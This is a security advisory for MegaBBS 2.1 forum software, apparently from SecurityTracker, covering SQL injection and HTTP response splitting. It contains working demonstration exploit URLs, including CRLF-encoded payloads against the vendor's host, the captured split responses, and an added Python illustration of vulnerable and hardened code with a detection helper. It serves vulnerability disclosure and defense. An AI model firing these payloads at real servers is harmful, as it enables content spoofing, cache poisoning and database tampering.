MegaBBS Input Validation Errors Let Remote Users Inject SQL Commands and Conduct Response Splitting Attacks
SecurityTracker Alert ID: 1011420
SecurityTracker URL: http://securitytracker.com/id?1011420
CVE Reference: CAN-2004-2145, CAN-2004-2146
Updated: Jul 2 2005
Original Entry Date: Sep 27 2004
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
Version(s): 2.1
Description: Several vulnerabilities were reported in MegaBBS. A remote user can inject SQL commands. A remote user can conduct an HTTP response splitting attack.
The 'ladder-log.asp' and 'view-profile.asp' scripts do not properly validate user-supplied input in certain parameters. A remote user can supply a specially crafted URL to execute SQL commands on the underlying database.
Some demonstration exploit URLs are provided:
ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'
A remote user can also submit a specially crafted URL to cause the target server to return a split response. The 'thread-post.asp' script copies the 'fid' parameter into the Location header of a redirect without filtering CR/LF characters, so encoded line breaks (%0d%0a) in that parameter terminate the redirect headers and let the remainder of the parameter be sent as a second, attacker-controlled response. A remote user can exploit this to spoof content on the target server, attempt to poison any intermediate web caches, or conduct cross-site scripting attacks.
Some demonstration exploit URLs are provided:
http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat
http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e%0d%0a&action=writenew&displaytype=flat
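Both issues in this advisory come from the same root cause named under "Cause" below: a query-string value is used as-is, once inside a SQL statement and once inside a redirect header. The following Python is an added illustration written for this page; it is not MegaBBS code and not part of the original advisory or the reporter's post. It models the two vulnerable patterns next to their hardened forms and adds a small detection helper that counts status lines in a raw response, which is how a proxy or test harness can tell a split response from a normal redirect. The member table, the query shape and the exact redirect bytes are constructed assumptions modelled on the parameter names and the captured output shown on this page; the crafted values are the percent-decoded 'fid' payload and the trailing quote from the 'memberid' examples.

```python
import re
import sqlite3

# Constructed inputs modelled on the advisory's demonstration URLs (the
# percent-decoded 'fid' value and the trailing quote from the 'memberid'
# examples). Built here for the demo, not captured from any server.
CRLF_PAYLOAD = (
    "\r\nContent-Length: 0\r\n\r\n"
    "HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nContent-Length: 33\r\n\r\n"
    "<html>Scanned by Maxpatrol</html>\r\n"
)
SQLI_PAYLOAD = "1'"

# Numeric ids such as fid, memberid and teamid get one strict rule:
# decimal digits only, bounded length. Anything else is rejected.
INT_PARAM = re.compile(r"[0-9]{1,9}")


def validate_int_param(value: str) -> int:
    """Return the id as an int, or raise ValueError for any non-numeric input."""
    if not INT_PARAM.fullmatch(value):
        raise ValueError(f"rejected non-numeric id: {value!r}")
    return int(value)


def reject_crlf(value: str) -> str:
    """Header values may never contain CR or LF; refuse rather than strip."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF in header value")
    return value


def build_redirect_unsafe(fid: str) -> bytes:
    """Vulnerable pattern: the raw query parameter is copied into Location."""
    return (
        "HTTP/1.1 302 Object moved\r\n"
        f"Location: /megabbs/forums/forum-view.asp?fid={fid}\r\n"
        "Content-Length: 0\r\n\r\n"
    ).encode()


def build_redirect_safe(fid: str) -> bytes:
    """Hardened form: validate the id, then re-check the assembled header value."""
    location = reject_crlf(f"/megabbs/forums/forum-view.asp?fid={validate_int_param(fid)}")
    return (
        "HTTP/1.1 302 Object moved\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\n\r\n"
    ).encode()


def count_status_lines(raw: bytes) -> int:
    """Detection helper: one redirect must carry exactly one status line.
    Two or more means the byte stream was split into several responses."""
    return len(re.findall(rb"(?m)^HTTP/1\.[01] \d{3}", raw))


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a forum member table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (memberid INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


def lookup_member_unsafe(conn: sqlite3.Connection, memberid: str):
    """Vulnerable pattern: the parameter is concatenated into the statement."""
    sql = "SELECT name FROM members WHERE memberid = " + memberid
    return conn.execute(sql).fetchone()


def lookup_member_safe(conn: sqlite3.Connection, memberid: str):
    """Hardened form: validated integer bound to a query placeholder."""
    sql = "SELECT name FROM members WHERE memberid = ?"
    return conn.execute(sql, (validate_int_param(memberid),)).fetchone()


def run_demo() -> dict:
    """Exercise both patterns with a benign id and with the crafted values."""
    conn = make_demo_db()
    out = {}
    out["split_unsafe"] = count_status_lines(build_redirect_unsafe(CRLF_PAYLOAD))  # 2
    out["split_safe"] = count_status_lines(build_redirect_safe("4924"))            # 1
    try:
        build_redirect_safe(CRLF_PAYLOAD)
        out["safe_rejects_crlf"] = False
    except ValueError:
        out["safe_rejects_crlf"] = True
    out["sql_unsafe_normal"] = lookup_member_unsafe(conn, "1")[0]
    try:
        lookup_member_unsafe(conn, SQLI_PAYLOAD)
        out["sql_unsafe_injected"] = "query ran"
    except sqlite3.Error:
        out["sql_unsafe_injected"] = "database error"  # the stray quote breaks the statement
    try:
        lookup_member_safe(conn, SQLI_PAYLOAD)
        out["safe_rejects_sqli"] = False
    except ValueError:
        out["safe_rejects_sqli"] = True
    return out


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The point of `count_status_lines` is that the captured output later on this page shows two status lines in what should be a single 302; that count is a cheap, protocol-level check a reverse proxy or a scanner can apply regardless of which parameter was abused. The hardened builders reject rather than sanitise, which is the right choice for ids that are only ever integers.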
Impact: A remote user can create a URL that, when loaded by the target user, will cause arbitrary content to be displayed.
A remote user may be able to poison any intermediate web caches with arbitrary content.
A remote user can inject SQL commands.
Solution: The vendor has released a fix, available at:
http://www.pd9soft.com/
[Editor's note: It appears that the vendor has not incremented the version number in the fixed version.]
Vendor URL: www.pd9soft.com/megabbs-support/index.asp
Cause: Input validation error
Underlying OS: Windows (NT), Windows (2000), Windows (2003)
Reported By: "pigrelax" <pigrelax@yandex.ru>
Message History:
None.
Source Message Contents
Date: Sun, 26 Sep 2004 21:56:44 +0400
From: "pigrelax" <pigrelax@yandex.ru>
Subject: [Full-Disclosure] HTTP Response Splitting and SQL injection in megabbs forum
URL: http://www.pd9soft.com
Tested megabbs 2.1
1. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat
Result:
<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:14:02 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33
<html>Scanned by Maxpatrol</html>
Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:13:02 GMT
Set-Cookie: guestID=309; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/
Cache-contro
<...>
2. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e%0d%0a&action=writenew&displaytype=flat
Result:
<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:34:05 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33
<html>Scanned by Maxpatrol</html>
Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:33:05 GMT
Set-Cookie: guestID=421; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=HCGIJIEDMBPIHPCDJFKACJAC; path=/
Cache-contro
<...>
3. More and more SQL injection:
ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'
MaxPatrol is a professional network security scanner distinguished by its
uncompromisingly high quality of scanning, optimized for effective use by
companies of any size (serving from a few to tens of thousands of nodes).
MaxPatrol developers were able quite simply to "ignore" about 40% of the
newly published vulnerabilities because their product's intelligent
algorithms had already detected them.
http://www.Maxpatrol.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html